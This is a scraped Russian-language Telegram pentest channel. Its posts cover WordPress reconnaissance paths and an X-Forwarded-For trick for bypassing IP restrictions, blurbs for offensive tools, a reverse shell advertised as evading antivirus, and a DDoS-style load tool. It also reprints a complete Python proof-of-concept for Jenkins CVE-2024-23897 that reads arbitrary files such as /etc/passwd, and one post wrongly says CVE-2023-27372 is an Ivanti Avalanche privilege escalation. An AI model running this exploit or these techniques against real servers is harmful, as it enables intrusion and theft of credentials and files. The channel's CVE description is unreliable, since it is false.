Security
Предупреждение:
весь контент в канале публикуется исключительно в образовательных целях.
Please open Telegram to view this post
VIEW IN TELEGRAM
💔2
Профессиональные советы по безопасности WordPress
Перечисление плагинов и тем
Используйте эндпоинты
/wp-json/wp/v2/themes или /wp-json/wp/v2/plugins.
Плагины часто раскрывают активные компоненты и информацию о версиях.
Используйте кэширование
Проверяйте устаревшие кэшированные версии конфиденциальных файлов.
Ошибки в конфигурации сервера
Проверьте, включено ли отображение содержимого директорий для /wp-content/.
Инструменты отладки
Используйте заголовки x-forwarded-for, чтобы обойти ограничения по IP.
💻 Список критичных путей WordPress для проверки:
/wp-admin.php
/wp-config.php
/wp-content/uploads
/wp-load
/wp-signup.php
/wp-json
/wp-includes/
/wp-login.php
/wp-links-opml.php
/wp-activate.php
/wp-blog-header.php
/wp-cron.php
/wp-links.php
/wp-mail.php
/xmlrpc.php
/wp-settings.php
/wp-trackback.php
/wp-signup.php
/admin-bar.php
/wp-json/wp/v2/users
👉 Подписаться 👈
Перечисление плагинов и тем
Используйте эндпоинты
/wp-json/wp/v2/themes или /wp-json/wp/v2/plugins.
Плагины часто раскрывают активные компоненты и информацию о версиях.
Используйте кэширование
Проверяйте устаревшие кэшированные версии конфиденциальных файлов.
Ошибки в конфигурации сервера
Проверьте, включено ли отображение содержимого директорий для /wp-content/.
Инструменты отладки
Используйте заголовки x-forwarded-for, чтобы обойти ограничения по IP.
/wp-admin.php
/wp-config.php
/wp-content/uploads
/wp-load
/wp-signup.php
/wp-json
/wp-includes/
/wp-login.php
/wp-links-opml.php
/wp-activate.php
/wp-blog-header.php
/wp-cron.php
/wp-links.php
/wp-mail.php
/xmlrpc.php
/wp-settings.php
/wp-trackback.php
/wp-signup.php
/admin-bar.php
/wp-json/wp/v2/users
👉 Подписаться 👈
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤1
CVE-2023-27372 — уязвимость типа Privilege Escalation (повышение привилегий), обнаруженная в Ivanti Avalanche, системе управления корпоративными мобильными устройствами (MDM).
🪙 💳 💳 Поддержать автора канала можно тут
👉 Подписаться 👈
#CVE #PHP
👉 Подписаться 👈
#CVE #PHP
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1
StegCloak - это чистый модуль стеганографии JavaScript, разработанный в стиле функционального программирования, для скрытия текста на виду.
Он использует такие методы, как сжатие, шифрование и специальные невидимые символы Unicode для скрытия текста, что позволяет использовать стеганографию.
➖ Его цель - безопасно скрывать текстовое содержимое и добавлять водяные знаки.
🪙 💳 💳 Поддержать автора канала можно тут либо купить книгу 📔
👉 Подписаться 👈
#Tool #stegcloa
Он использует такие методы, как сжатие, шифрование и специальные невидимые символы Unicode для скрытия текста, что позволяет использовать стеганографию.
👉 Подписаться 👈
#Tool #stegcloa
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Подборка инструментов для создания анонимной среды
🟢 OnionShare: позволяет безопасно и анонимно отправлять файлы и обмениваться данными через Tor, создавая временные "луковые" адреса для загрузки и скачивания.
🟢 SecureDrop: это система для безопасного обмена информацией между источниками и журналистами, позволяющая подать анонимное сообщение.
🟢 CalyxOS: это операционная система для мобильных устройств, ориентированная на конфиденциальность и безопасность. Она позволяет использовать приватные приложения и обеспечивает анонимность.
🟢 Cryptocat: позволяет пользователям обмениваться зашифрованными сообщениями в реальном времени, обеспечивая безопасность переписки разговора.
🟢 Privacy Badger: расширение для браузеров, которое автоматически блокирует трекеры, уменьшая объем собираемой о вас информации.
🪙 💳 💳 Поддержать автора канала можно тут / купить книгу 📔
👉 Подписаться 👈
#tools
👉 Подписаться 👈
#tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#cve #smb #exploit #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13
Hackvertor — еще один инструмент, который выведет работу с Burp Suit на новый уровень.
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Burp #Hackvertor
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Burp #Hackvertor
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤1
AES-256 - это очень мощный и продвинутый метод шифрования, для взлома этого шифрования с использованием передовых компьютеров потребуется много лет.
AnonX - это загрузчик и загрузка зашифрованных файлов. Загруженный архив длится одну неделю и должен быть удален с сервера.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#tool #osint
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤1
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Jenkins #cve #poc
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Jenkins #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Это умный Tor-краулер с открытым исходным кодом с весьма внушительным функционалом и "мозгами".
Функционал:
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#TorBot #Tor #Bot
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
SQL-injection - одна из популярных и высокоэффективных атак на веб-приложения
Этот инструмент используется для сканирования уязвимостей SQL-инъекции на основе Python, который также может находить уязвимые веб-сайты SQL через Google Dorks.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#SQLiv #SQL #Scan #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡3
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#http
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Новый обратный шелл под названием ReverseShell_2025_01.ps1
На момент публикации ни один из скриптов не был помечен антивирусными системами. Однако, как правило, в течение 2-3 недель после публикации некоторые поставщики начинают обнаруживать и помечать вредоносные файлы.
Купить книгу по пентесту для начинающих можно тут
#Shell #Powershell #AV
👉 Подписаться 👈
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1
Miku Miku Beam — это мощный сервер стресс-тестирования, доступный на GitHub
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
🔥13